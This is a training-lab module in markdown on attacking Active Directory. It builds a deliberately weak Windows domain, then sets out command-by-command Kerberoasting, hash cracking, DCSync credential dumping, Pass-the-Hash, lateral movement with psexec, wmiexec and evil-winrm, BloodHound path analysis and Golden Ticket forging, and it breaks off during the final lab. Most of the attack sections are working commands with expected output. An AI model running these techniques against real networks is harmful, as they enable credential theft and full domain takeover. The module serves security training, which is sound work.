seclab/MOD5_Active_Directory_Emulation.md
2026-05-28 18:27:41 -06:00

# MODULE 5: ACTIVE DIRECTORY THREAT EMULATION
## Learning Objectives
By completing this module, you will:
- Understand Active Directory architecture and Kerberos authentication
- Deploy a Windows domain environment with Domain Controller and endpoints
- Execute Kerberoasting attacks to extract and crack service account credentials
- Perform Pass-the-Hash and Pass-the-Ticket credential replay attacks
- Conduct lateral movement using PsExec, WMI, and Windows Management protocols
- Enumerate AD environments using BloodHound and PowerView
- Map AD attack techniques to MITRE ATT&CK framework
- Implement detection rules for identity-based attacks
---
## Key Concepts
### Active Directory (AD)
**Active Directory** is Microsoft's centralized identity and access management system and the identity backbone of most enterprise Windows networks. AD provides:
- **Authentication:** Verifies user/computer identities via Kerberos
- **Authorization:** Controls access to resources (files, printers, applications)
- **Directory Services:** Centralized database of users, computers, groups, policies
### Kerberos Authentication Protocol
```
   User                       Domain Controller (KDC)               File Server
     |                                 |                                  |
     |---1. AS-REQ ------------------->|  (request TGT)                   |
     |<--2. AS-REP (TGT)---------------|  (Ticket Granting Ticket)        |
     |                                 |                                  |
     |---3. TGS-REQ (TGT, SPN)-------->|  (request service ticket)        |
     |<--4. TGS-REP (ST)---------------|  (Service Ticket)                |
     |                                 |                                  |
     |---5. AP-REQ (ST)------------------------------------------------>|
     |<--6. AP-REP / access granted-------------------------------------|
```
**Key Terms:**
- **TGT (Ticket Granting Ticket):** Proves identity to the Domain Controller; encrypted under the KRBTGT account's key
- **Service Ticket (ST):** Grants access to one specific service (file share, SQL server); encrypted under that service account's key
- **SPN (Service Principal Name):** Identifier for a service (e.g., `HTTP/web.apophis.local`); a user account with an SPN can have tickets requested for it
- **NT hash (often called the NTLM hash):** MD4 of the UTF-16LE password. Windows stores it instead of the password, it is the RC4-HMAC Kerberos key, and it is sufficient on its own for NTLM authentication (hence Pass-the-Hash)
### Why Active Directory is Critical Attack Surface
**Enterprise Reality:**
- The large majority of enterprises run Active Directory, so its weaknesses are nearly universal
- Single compromised domain admin account = full network compromise
- Identity-based attacks bypass perimeter security (firewalls, VPNs)
- Most data breaches involve credential theft, not software exploits
**Common AD Attacks:**
1. **Kerberoasting:** Extract encrypted service tickets, crack offline
2. **Pass-the-Hash:** Use stolen NTLM hash without knowing plaintext password
3. **Golden Ticket:** Forge TGTs to impersonate any user
4. **DCSync:** Replicate AD database to steal all password hashes
---
## LAB 5.1: DEPLOY ACTIVE DIRECTORY DOMAIN
### Deploy Windows Server 2022 (Domain Controller)
```
1. CREATE VM IN PROXMOX:
- VM ID: 402
- Name: DC01-Apophis
- OS: Windows Server 2022 ISO
- CPU: 2 cores
- RAM: 4096 MB (4 GB minimum for AD)
- Disk: 60 GB
- Network: vmbr0, VLAN Tag: 400 (VICTIM_NET)
2. INSTALL WINDOWS SERVER:
- Select: Windows Server 2022 Standard (Desktop Experience)
- Custom installation: Select full disk
- Set Administrator password: P@ssw0rd! (for lab only)
3. CONFIGURE STATIC IP:
- Open: Settings > Network & Internet > Ethernet
- IP address: 10.10.4.100
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 127.0.0.1 (will point to itself after AD installation)
4. RENAME COMPUTER:
- Server Manager > Local Server > Computer Name > Change
- New name: DC01
- Restart when prompted
5. INSTALL ACTIVE DIRECTORY DOMAIN SERVICES:
- Server Manager > Manage > Add Roles and Features
- Server Roles: Check "Active Directory Domain Services"
- Click "Add Features" when prompted
- Click "Next" through wizard, then "Install"
- Wait 5-10 minutes for installation
6. PROMOTE TO DOMAIN CONTROLLER:
- Server Manager > Notification flag (yellow triangle)
- Click "Promote this server to a domain controller"
- Select: "Add a new forest"
- Root domain name: apophis.local
- Forest/Domain functional level: Windows Server 2016 (default)
- DSRM password: P@ssw0rd!
- Click "Next" through wizard
- Prerequisites Check: Click "Install"
- Server will automatically restart (takes 5-10 minutes)
7. VERIFY AD INSTALLATION:
- Login as: APOPHIS\Administrator
- Password: P@ssw0rd!
- Open: Active Directory Users and Computers (Start > search "dsa.msc")
- Expand apophis.local > See default OUs (Users, Computers, Domain Controllers)
```
### Deploy Windows 10 (Domain Endpoint)
```
1. CREATE VM IN PROXMOX:
- VM ID: 403
- Name: CLIENT01-Apophis
- OS: Windows 10 Pro ISO
- CPU: 2 cores
- RAM: 4096 MB
- Disk: 40 GB
- Network: vmbr0, VLAN Tag: 400
2. INSTALL WINDOWS 10:
- Select: Windows 10 Pro
- Create local user: labuser
- Password: Welcome1
3. CONFIGURE NETWORK:
- Settings > Network & Internet > Ethernet > Change adapter options
- Right-click Ethernet > Properties > IPv4
- IP address: 10.10.4.110
- Subnet: 255.255.255.0
- Gateway: 10.10.4.1
- DNS: 10.10.4.100 (Domain Controller IP)
- Click OK
4. VERIFY DNS RESOLUTION:
- Open Command Prompt
- Run: nslookup apophis.local
- Should resolve to: 10.10.4.100
- If not, check DC01 DNS service is running
5. JOIN DOMAIN:
- Settings > System > About > Rename this PC (advanced)
- Click "Change"
- Member of: Domain
- Domain: apophis.local
- Click OK
- Credentials: APOPHIS\Administrator / P@ssw0rd!
- Welcome message appears: "Welcome to the apophis.local domain"
- Restart when prompted
6. LOGIN AS DOMAIN USER:
- At login screen: Other user
- Username: Administrator
- Password: P@ssw0rd!
- Domain: APOPHIS (or APOPHIS\Administrator)
- Verify: whoami → apophis\administrator
```
### Create Vulnerable Service Account (Kerberoasting Target)
```powershell
# On Domain Controller (DC01), open PowerShell as Administrator
# CREATE ORGANIZATIONAL UNIT FOR SERVICE ACCOUNTS
New-ADOrganizationalUnit -Name "Service Accounts" -Path "DC=apophis,DC=local"
# CREATE SERVICE ACCOUNT WITH WEAK PASSWORD
New-ADUser -Name "svc_sql" `
    -SamAccountName "svc_sql" `
    -UserPrincipalName "svc_sql@apophis.local" `
    -AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) `
    -Enabled $true `
    -PasswordNeverExpires $true `
    -Path "OU=Service Accounts,DC=apophis,DC=local"
# ASSIGN SERVICE PRINCIPAL NAME (SPN) - THIS MAKES IT KERBEROASTABLE
setspn -A MSSQLSvc/sqlserver.apophis.local:1433 apophis\svc_sql
# VERIFY SPN WAS SET
setspn -L svc_sql
# Expected output:
# Registered ServicePrincipalNames for CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local:
# MSSQLSvc/sqlserver.apophis.local:1433
# ADD TO DOMAIN ADMINS (simulate high-privilege service account)
Add-ADGroupMember -Identity "Domain Admins" -Members svc_sql
# CREATE ADDITIONAL DOMAIN USERS FOR REALISM
New-ADUser -Name "John Smith" -SamAccountName "jsmith" -AccountPassword (ConvertTo-SecureString "Welcome1" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Jane Doe" -SamAccountName "jdoe" -AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "Bob Admin" -SamAccountName "badmin" -AccountPassword (ConvertTo-SecureString "Admin123" -AsPlainText -Force) -Enabled $true
# ADD BOB TO DOMAIN ADMINS
Add-ADGroupMember -Identity "Domain Admins" -Members badmin
# VERIFY USERS CREATED
Get-ADUser -Filter * | Select-Object Name, SamAccountName
```
**Why This Configuration is Vulnerable:**
- **Weak Password:** "Password123" is in common wordlists (rockyou.txt)
- **SPN Assigned:** Any domain user can request service ticket for this account
- **Password Never Expires:** No rotation policy (common in real enterprises)
- **Domain Admin Membership:** Cracking this account = full domain compromise
---
## LAB 5.2: KERBEROASTING ATTACK
### Understanding Kerberoasting
**Attack Flow:**
1. Attacker compromises a low-privilege domain user account
2. Queries AD (LDAP) for user accounts that have a Service Principal Name (SPN) set
3. Requests a service ticket (TGS-REQ) for each of those SPNs from the Domain Controller
4. The DC issues tickets whose encrypted part is keyed by the service account's long-term key: with RC4-HMAC (etype 23) that key is literally the account's NT hash; with AES it is a PBKDF2-derived key that still depends only on the password and a fixed salt
5. Attacker takes the tickets offline and cracks them with hashcat/John (no further contact with the DC, no account lockout)
6. If the password is weak, the attacker obtains the plaintext
**Why It Works:**
- Any authenticated domain user may request a service ticket for any SPN; the KDC does not check whether the requester will ever present it
- The ticket is encrypted under the service account's key, not a random session key, and the HMAC inside the ticket lets a guess be verified
- Verification runs offline at millions (RC4) to tens of thousands (AES) of guesses per second per GPU
- No failed logons are produced, so lockout thresholds and bad-password counters never move
### LAB 5.2.1: Kerberoasting with Impacket (from Kali Linux)
**Prerequisites:**
- Compromised domain credentials (jsmith / Welcome1)
- Network access to Domain Controller (10.10.4.100)
```bash
# FROM KALI LINUX (VLAN 200 - Red Team)
# STEP 1: VERIFY CONNECTIVITY TO DOMAIN CONTROLLER
ping 10.10.4.100
# Expected: Replies from 10.10.4.100
# STEP 2: VERIFY DNS RESOLUTION (if pfSense DNS configured)
nslookup apophis.local 10.10.4.100
# Expected: Name: apophis.local, Address: 10.10.4.100
# STEP 3: ENUMERATE SPNS WITH GETUSERSPNS.PY (Impacket)
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100
# Expected Output:
# ServicePrincipalName Name MemberOf PasswordLastSet
# ------------------------------------- ------- ------------------------------------ -------------------
# MSSQLSvc/sqlserver.apophis.local:1433 svc_sql CN=Domain Admins,CN=Users,DC=apophis 2024-01-15 10:23:45
# STEP 4: REQUEST SERVICE TICKET AND SAVE TO FILE
GetUserSPNs.py apophis.local/jsmith:Welcome1 -dc-ip 10.10.4.100 -request -outputfile kerberoast_hashes.txt
# Expected Output:
# [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
# ^ If you see this, sync time with: sudo ntpdate 10.10.4.100
# Successful output:
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL$MSSQLSvc/sqlserver.apophis.local:1433*$a1b2c3d4...
# STEP 5: VERIFY HASH FILE
cat kerberoast_hashes.txt
# Should contain Kerberos TGS-REP hash in John/Hashcat format
# STEP 6: CRACK WITH HASHCAT
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
# -m 13100 = Kerberos 5 TGS-REP etype 23 (RC4-HMAC). Check the hash prefix first:
#   $krb5tgs$23$ -> -m 13100, $krb5tgs$17$ -> -m 19600 (AES128), $krb5tgs$18$ -> -m 19700 (AES256)
#   (an AES-only service account, or a DC that refuses RC4, yields the much slower AES formats)
# --force = Ignore warnings (for VM environments without GPU drivers)
# Expected Output (after 30-60 seconds):
# $krb5tgs$23$*svc_sql$APOPHIS.LOCAL...:Password123
# STEP 7: EXTRACT CRACKED PASSWORD
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --show
# Output: ...svc_sql...:Password123
# STEP 8: VERIFY CREDENTIALS WITH CRACKMAPEXEC
crackmapexec smb 10.10.4.100 -u svc_sql -p Password123 -d apophis.local
# Expected Output:
# SMB 10.10.4.100 445 DC01 [+] apophis.local\svc_sql:Password123 (Pwn3d!)
# "Pwn3d!" = Account has administrative access to target
```
**Alternative: Rubeus (from Windows endpoint)**
```powershell
# If you have foothold on CLIENT01 (Windows 10 domain-joined)
# Download Rubeus from GitHub (https://github.com/GhostPack/Rubeus)
# Transfer to CLIENT01 via SMB/HTTP
# Execute Rubeus
.\Rubeus.exe kerberoast /outfile:tickets.txt
# Expected Output:
# [*] Total kerberoastable users : 1
# [*] SamAccountName : svc_sql
# [*] DistinguishedName : CN=svc_sql,OU=Service Accounts,DC=apophis,DC=local
# [*] ServicePrincipalName : MSSQLSvc/sqlserver.apophis.local:1433
# [*] Hash written to tickets.txt
# Transfer tickets.txt to Kali for cracking
```
**Deliverable:** Screenshot showing:
1. GetUserSPNs.py enumeration output
2. Hashcat cracking success with plaintext password revealed
3. CrackMapExec verification showing "Pwn3d!"
---
## LAB 5.3: PASS-THE-HASH ATTACK
### Understanding Pass-the-Hash
**Concept:** NTLM authentication is a challenge-response protocol keyed by the NT hash, never by the password itself: the client answers the server's challenge with an HMAC-MD5 computed from the hash. Anyone holding the hash can therefore produce a valid response and log on as that user without cracking anything, which is why NT hashes are password-equivalent.
**Attack Scenario:**
1. Attacker compromises a workstation with local admin access
2. Dumps LSASS memory (or the SAM/NTDS.dit hives) to extract the NT hashes of logged-on or stored accounts
3. Uses a hash to authenticate to other systems over SMB/WMI/WinRM (RDP only where Restricted Admin mode is enabled)
4. Repeats the process to move laterally, spraying one hash across the subnet or targeting specific hosts
### LAB 5.3.1: Dumping NTLM Hashes with Secretsdump
```bash
# FROM KALI LINUX
# STEP 1: DUMP HASHES FROM DOMAIN CONTROLLER (DCSync: secretsdump asks the DC to replicate NTDS.dit over DRSUAPI,
# which needs Domain Admin or replication rights; svc_sql has them. This is logged on DC01 as Event ID 4662.)
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output (NTLM hashes):
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
# svc_sql:1104:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
# jsmith:1105:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
# Format: username:RID:LM_hash:NTLM_hash:::
# LM hash (aad3b435...) = Empty/disabled (modern Windows)
# NTLM hash = What we need for Pass-the-Hash
# STEP 2: SAVE ADMINISTRATOR NTLM HASH
ADMIN_HASH="58a478135a93ac3bf058a5ea0e8fdb71"
# This is the NT hash for Administrator account
# STEP 3: PASS-THE-HASH TO CLIENT01 (without knowing plaintext password)
# The hash belongs to the DOMAIN Administrator, so name the domain; with no domain the target checks its local SAM and fails
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:$ADMIN_HASH apophis.local/Administrator@10.10.4.110
# Breakdown:
# -hashes LM:NTLM (LM is always aad3b435b51404eeaad3b435b51404ee for empty; it may be omitted as ":NTHASH")
# apophis.local/Administrator = domain and username
# @10.10.4.110 = target (CLIENT01)
# Expected Output:
# [*] Requesting shares on 10.10.4.110.....
# [*] Found writable share ADMIN$
# [*] Uploading file [random].exe
# [*] Opening SVCManager on 10.10.4.110.....
# [*] Starting service [random] on 10.10.4.110.....
# [!] Press help for extra shell commands
# C:\Windows\system32>
# STEP 4: VERIFY ACCESS
whoami
# Output: nt authority\system (SYSTEM = highest privilege)
hostname
# Output: CLIENT01
# STEP 5: DUMP LOCAL SAM DATABASE (for more credentials)
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
# Download files to Kali (or use secretsdump on localhost)
```
**Alternative: CrackMapExec for Pass-the-Hash**
```bash
# TEST HASH AGAINST MULTIPLE TARGETS (spray technique)
crackmapexec smb 10.10.4.0/24 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 -d apophis.local
# -d apophis.local = the hash is the domain Administrator's; --local-auth would try it as a LOCAL account and fail
# /24 = Scan entire subnet
# Expected Output:
# SMB 10.10.4.110 445 CLIENT01 [+] apophis.local\Administrator:58a478... (Pwn3d!)
# SMB 10.10.4.100 445 DC01 [+] apophis.local\Administrator:58a478... (Pwn3d!)
# EXECUTE COMMANDS REMOTELY WITH PASS-THE-HASH
crackmapexec smb 10.10.4.110 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71 -d apophis.local -x "whoami"
# -x = Execute command (default exec method is WMI, so it runs as the authenticated user, not SYSTEM)
# Expected Output: apophis\administrator
```
**Deliverable:**
- Screenshot showing secretsdump.py output with NTLM hashes
- Screenshot showing successful psexec.py shell with "nt authority\system"
---
## LAB 5.4: LATERAL MOVEMENT TECHNIQUES
### LAB 5.4.1: PsExec (Service-Based Execution)
**How PsExec Works:**
1. Connects to target via SMB (port 445)
2. Copies executable to ADMIN$ share (C:\Windows)
3. Creates and starts Windows service to run executable
4. Returns output via named pipes
```bash
# PSEXEC WITH CREDENTIALS
psexec.py apophis.local/svc_sql:Password123@10.10.4.110
# PSEXEC WITH HASH (domain account, so include the domain)
psexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 apophis.local/Administrator@10.10.4.110
# PSEXEC TO DOMAIN CONTROLLER (single quotes stop bash history expansion on the "!" in the password)
psexec.py 'apophis.local/Administrator:P@ssw0rd!@10.10.4.100'
# Expected Shell:
# C:\Windows\system32> whoami
# nt authority\system
```
**Detection Artifacts:**
- Service creation event (Event ID 7045)
- Network connection to ADMIN$/IPC$ shares
- Process with parent: services.exe
### LAB 5.4.2: WMIExec (No Service, No Dropped Binary)
**Advantage over PsExec:** No service is installed and no executable is written, so Event ID 7045 never fires. It is not fully fileless: by default wmiexec.py redirects each command's output to a temporary file in the ADMIN$ share and reads it back over SMB (use `-nooutput` to avoid that, at the cost of seeing no output).
```bash
# WMIEXEC WITH CREDENTIALS
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110
# WMIEXEC WITH HASH
wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 Administrator@10.10.4.110
# Expected Shell:
# C:\> whoami
# apophis\administrator
# EXECUTE SINGLE COMMAND (no interactive shell)
wmiexec.py apophis.local/svc_sql:Password123@10.10.4.110 "ipconfig"
```
**Detection Artifacts:**
- WMI process creation (Event ID 4688 with parent: WmiPrvSE.exe)
- Network: DCOM/WMI traffic (port 135 + ephemeral)
### LAB 5.4.3: SMBExec (Batch File Execution)
```bash
# SMBEXEC WITH CREDENTIALS
smbexec.py apophis.local/svc_sql:Password123@10.10.4.110
# Each command becomes a new service whose binPath runs cmd.exe /Q /c with the command echoed into a .bat in %TEMP% and the output written to a share
# No custom executable is dropped, but every command produces its own Event ID 7045 (service name BTOBTO by default), so it is noisier than PsExec in the event log, not stealthier
```
### LAB 5.4.4: Evil-WinRM (PowerShell Remoting)
**Prerequisite:** Target must have WinRM enabled (default on Servers, not Workstations)
```bash
# INSTALL EVIL-WINRM
sudo gem install evil-winrm
# CONNECT WITH CREDENTIALS
evil-winrm -i 10.10.4.100 -u Administrator -p 'P@ssw0rd!'
# CONNECT WITH HASH
evil-winrm -i 10.10.4.100 -u Administrator -H 58a478135a93ac3bf058a5ea0e8fdb71
# Expected Shell:
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
apophis\administrator
# UPLOAD FILES
upload /root/tools/mimikatz.exe C:\Windows\Temp\mimikatz.exe
# DOWNLOAD FILES (the live SAM hive is locked by the kernel, so export it with reg save first)
reg save HKLM\SAM C:\Windows\Temp\sam
reg save HKLM\SYSTEM C:\Windows\Temp\system
download C:\Windows\Temp\sam /root/loot/sam
download C:\Windows\Temp\system /root/loot/system
```
---
## LAB 5.5: ACTIVE DIRECTORY ENUMERATION WITH BLOODHOUND
### Understanding BloodHound
**BloodHound** visualizes Active Directory relationships to identify attack paths:
- Who has admin rights on which computers?
- Shortest path from user X to Domain Admin?
- Which accounts have SPN (Kerberoastable)?
- Trust relationships between domains?
**Attack Workflow:**
1. Run SharpHound collector (PowerShell/C#) on domain-joined machine
2. Generates JSON files with AD relationships
3. Import into BloodHound GUI to visualize
4. Query for attack paths (e.g., "Shortest Path to Domain Admins")
### LAB 5.5.1: Install BloodHound on Kali
```bash
# STEP 1: INSTALL NEO4J (graph database)
sudo apt update
sudo apt install neo4j bloodhound -y
# GUI and collector must be the same generation: legacy BloodHound 4.x takes bloodhound-python output,
# BloodHound CE needs the CE branch of the ingestor. Mixed versions import zero nodes without an error.
# STEP 2: START NEO4J DATABASE
sudo neo4j console
# Wait for "Started" message
# Access web UI: http://localhost:7474
# Default creds: neo4j / neo4j
# Change password when prompted: bloodhound123
# STEP 3: START BLOODHOUND GUI (new terminal)
bloodhound
# Login:
# Database URL: bolt://localhost:7687
# Username: neo4j
# Password: bloodhound123
```
### LAB 5.5.2: Collect AD Data with BloodHound Python Ingestor
```bash
# FROM KALI LINUX (no need to touch Windows machines)
# INSTALL BLOODHOUND-PYTHON (recent Kali refuses system-wide pip installs, so use pipx or a venv)
pipx install bloodhound
# RUN COLLECTOR
bloodhound-python -u jsmith -p Welcome1 -d apophis.local -ns 10.10.4.100 -c All
# Parameters:
# -u = username
# -p = password
# -d = domain
# -ns = nameserver (DC IP)
# -c All = collect everything (users, groups, computers, sessions, trusts)
# Expected Output:
# INFO: Found AD domain: apophis.local
# INFO: Connecting to LDAP server: dc01.apophis.local
# INFO: Found 1 domains
# INFO: Found 1 domains in the forest
# INFO: Found 2 computers
# INFO: Found 5 users
# INFO: Found 0 trusts
# INFO: Starting computer enumeration...
# INFO: Done in 00M 12S
# OUTPUT FILES:
ls -lh *.json
# 20240115_computers.json
# 20240115_users.json
# 20240115_groups.json
# 20240115_domains.json
```
### LAB 5.5.3: Analyze Attack Paths in BloodHound
```
1. IMPORT DATA INTO BLOODHOUND:
- BloodHound GUI > Upload Data (right panel)
- Select all JSON files from previous step
- Wait for import to complete (shows # of nodes processed)
2. SEARCH FOR DOMAIN ADMINS:
- Search bar > Type "Domain Admins" > Select group
- Right-click node > "Mark Group as High Value"
- Graph shows all members (Administrator, svc_sql, badmin)
3. FIND KERBEROASTABLE ACCOUNTS:
- Analysis tab > "List all Kerberoastable Accounts"
- Should show: svc_sql with SPN MSSQLSvc/sqlserver.apophis.local:1433
4. FIND SHORTEST PATH TO DOMAIN ADMINS:
- Analysis tab > "Shortest Paths to Domain Admins"
- Shows graph of attack paths from low-privilege users
- Example: jsmith → CLIENT01 (LocalAdmin) → badmin (Session) → Domain Admins
5. FIND COMPUTERS WHERE DOMAIN ADMINS ARE LOGGED IN:
- Search for specific user (e.g., "Administrator")
- Click node > "Sessions" tab
- Shows CLIENT01, DC01 (indicates where admin is logged in = PtH target)
6. CUSTOM CYPHER QUERY (advanced):
- Raw Query box (bottom):
MATCH (u:User {hasspn: true}) RETURN u
- Returns all users with SPN (Kerberoastable targets)
```
**Key Queries to Practice:**
```cypher
// Find all Domain Admins
MATCH (n:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}) RETURN n
// Find computers with unconstrained delegation (privilege escalation vector)
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
// Find users with "Password Never Expires"
MATCH (u:User {pwdneverexpires:true}) RETURN u
// Shortest path from specific user to Domain Admins
MATCH (u:User {name:"JSMITH@APOPHIS.LOCAL"}), (g:Group {name:"DOMAIN ADMINS@APOPHIS.LOCAL"}), p=shortestPath((u)-[*1..]->(g)) RETURN p
```
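The same questions the GUI answers (Kerberoastable users, shortest path from a user to Domain Admins), computed directly from the collector's output. This is an added example, not part of the module or of BloodHound; the data is a constructed, trimmed imitation of bloodhound-python's users/groups/computers JSON with only the keys used here, built to contain the lab's expected path and nothing more (so, unlike real data, the Domain Admins group has no outgoing edges). It covers both the analysis procedure above and the Cypher queries: `hasspn` is a plain property lookup, and `shortestPath` is a breadth-first search over MemberOf, AdminTo and HasSession edges.

```python
"""BloodHound without the GUI: Kerberoastable accounts and a shortest attack path from the
collector JSON. Constructed, simplified data modelled on bloodhound-python v4 output."""
from collections import deque

SID = "S-1-5-21-1234567890-1234567890-1234567890"  # constructed domain SID
USERS = {"data": [
    {"ObjectIdentifier": f"{SID}-1105", "Properties": {"name": "JSMITH@APOPHIS.LOCAL", "hasspn": False, "pwdneverexpires": False}},
    {"ObjectIdentifier": f"{SID}-1104", "Properties": {"name": "SVC_SQL@APOPHIS.LOCAL", "hasspn": True, "pwdneverexpires": True,
                                                        "serviceprincipalnames": ["MSSQLSvc/sqlserver.apophis.local:1433"]}},
    {"ObjectIdentifier": f"{SID}-1107", "Properties": {"name": "BADMIN@APOPHIS.LOCAL", "hasspn": False, "pwdneverexpires": False}},
]}
GROUPS = {"data": [
    {"ObjectIdentifier": f"{SID}-512", "Properties": {"name": "DOMAIN ADMINS@APOPHIS.LOCAL"},
     "Members": [{"ObjectIdentifier": f"{SID}-1104", "ObjectType": "User"},
                 {"ObjectIdentifier": f"{SID}-1107", "ObjectType": "User"}]},
]}
COMPUTERS = {"data": [
    {"ObjectIdentifier": f"{SID}-1001", "Properties": {"name": "CLIENT01.APOPHIS.LOCAL"},
     "LocalAdmins": {"Results": [{"ObjectIdentifier": f"{SID}-1105", "ObjectType": "User"}]},
     "Sessions": {"Results": [{"UserSID": f"{SID}-1107", "ComputerSID": f"{SID}-1001"}]}},
]}


def build_graph(users, groups, computers):
    """Directed edges (src, relation, dst) keyed by display name: MemberOf, AdminTo, HasSession."""
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for d in (users, groups, computers) for o in d["data"]}
    edges = []
    for g in groups["data"]:
        edges += [(names[m["ObjectIdentifier"]], "MemberOf", names[g["ObjectIdentifier"]]) for m in g["Members"]]
    for c in computers["data"]:
        host = names[c["ObjectIdentifier"]]
        edges += [(names[a["ObjectIdentifier"]], "AdminTo", host) for a in c["LocalAdmins"]["Results"]]
        edges += [(host, "HasSession", names[s["UserSID"]]) for s in c["Sessions"]["Results"]]
    return edges


def kerberoastable(users):
    """Equivalent of: MATCH (u:User {hasspn: true}) RETURN u"""
    return [(u["Properties"]["name"], u["Properties"].get("serviceprincipalnames", []))
            for u in users["data"] if u["Properties"].get("hasspn")]


def shortest_path(edges, start, goal):
    """BFS over the edge list; the Cypher shortestPath((u)-[*1..]->(g)) by hand. None if unreachable."""
    out = {}
    for s, rel, d in edges:
        out.setdefault(s, []).append((rel, d))
    prev, queue = {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while prev[node]:
                src, rel = prev[node]
                path.append((src, rel, node))
                node = src
            return path[::-1]
        for rel, nxt in out.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None


if __name__ == "__main__":
    print("kerberoastable:", kerberoastable(USERS))
    for hop in shortest_path(build_graph(USERS, GROUPS, COMPUTERS), "JSMITH@APOPHIS.LOCAL", "DOMAIN ADMINS@APOPHIS.LOCAL"):
        print(" -[%s]-> ".join(("{}", "{}")).format(hop[0], hop[2]) % hop[1])
```

The path found is jsmith -AdminTo-> CLIENT01 -HasSession-> badmin -MemberOf-> Domain Admins, i.e. the one the lab expects: local admin on CLIENT01 lets jsmith dump badmin's credentials from LSASS while badmin has a session there. On real collections, add the ACL-derived edges (GenericAll, WriteDacl, and so on) from the `Aces` arrays to the same edge list and the search is unchanged.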
**Deliverable:**
- Screenshot showing BloodHound graph with "Shortest Path to Domain Admins"
- Screenshot showing Kerberoastable accounts query result
---
## LAB 5.6: GOLDEN TICKET ATTACK (ADVANCED)
### Understanding Golden Tickets
**Golden Ticket** = Forged Kerberos TGT (Ticket Granting Ticket), encrypted and signed with the KRBTGT account's key, that grants:
- Impersonation of any user, with any group memberships the forger writes into the PAC
- Access to any Kerberos-protected resource in the domain
- Whatever validity the forger chooses (ticketer.py and mimikatz default to 10 years; a real TGT's default maximum lifetime is 10 hours)
**Requirements:**
- KRBTGT account NT hash or AES key (extracted from a Domain Controller, e.g. via DCSync)
- Domain SID (Security Identifier)
**Why It's Devastating:**
- Survives user password changes (it depends on the KRBTGT key, not on any user's password)
- Hard to spot with ordinary monitoring: the DC accepts it as a validly encrypted ticket, so only details betray it (non-existent account names, RC4 where the domain uses AES, TGS requests with no matching TGT request)
- Persists until the KRBTGT password is rotated twice (the KDC honours the previous key until the second reset)
### LAB 5.6.1: Extract KRBTGT Hash
```bash
# FROM KALI LINUX (requires Domain Admin access)
# METHOD 1: SECRETSDUMP AGAINST DOMAIN CONTROLLER
secretsdump.py apophis.local/svc_sql:Password123@10.10.4.100 -just-dc-user krbtgt
# Expected Output:
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3:::
# SAVE KRBTGT HASH
KRBTGT_HASH="d3a5c2e9f8b7e4a1c6f8d9e7b6a5c4e3"
# STEP 2: GET DOMAIN SID
lookupsid.py apophis.local/svc_sql:Password123@10.10.4.100
# Expected Output:
# [*] Domain SID is: S-1-5-21-1234567890-1234567890-1234567890
# SAVE DOMAIN SID exactly as printed (no trailing -RID; user SIDs are this value plus -RID, e.g. -500 for Administrator)
DOMAIN_SID="S-1-5-21-1234567890-1234567890-1234567890"
```
### LAB 5.6.2: Forge Golden Ticket
```bash
# CREATE GOLDEN TICKET WITH TICKETER.PY (Impacket)
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain apophis.local fakeadmin
# Parameters:
# -nthash = KRBTGT NT hash
# -domain-sid = Domain SID
# -domain = Domain name
# fakeadmin = Username to impersonate; ticketer's defaults put RID 500 and the Domain Admins/Enterprise Admins groups in the PAC
# CAVEAT: DCs with the November 2022 PAC hardening (CVE-2021-42287 enforcement) check that the PAC requestor SID belongs to the
# named account, so a non-existent "fakeadmin" is rejected with KDC_ERR_TGT_REVOKED. On a patched DC01, forge for a real account and RID:
# ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain apophis.local -user-id 500 Administrator
# Expected Output:
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for apophis.local/fakeadmin
# [*] Signing/Encrypting final ticket
# [*] Saving ticket in fakeadmin.ccache
# EXPORT TICKET TO ENVIRONMENT VARIABLE (ticketer writes fakeadmin.ccache in the current directory)
export KRB5CCNAME=$PWD/fakeadmin.ccache
# VERIFY TICKET
klist
# Expected:
# Ticket cache: FILE:/root/fakeadmin.ccache
# Default principal: fakeadmin@APOPHIS.LOCAL
# Valid starting Expires Service principal
# 01/15/24 10:00:00 01/25/34 10:00:00 krbtgt/APOPHIS.LOCAL@APOPHIS.LOCAL
```
### LAB 5.6.3: Use Golden Ticket for Access
```bash
# ACCESS DOMAIN CONTROLLER WITH GOLDEN TICKET
# Kerberos needs the target by hostname (the SPN is cifs/DC01.apophis.local); -target-ip and -dc-ip avoid depending on Kali's DNS
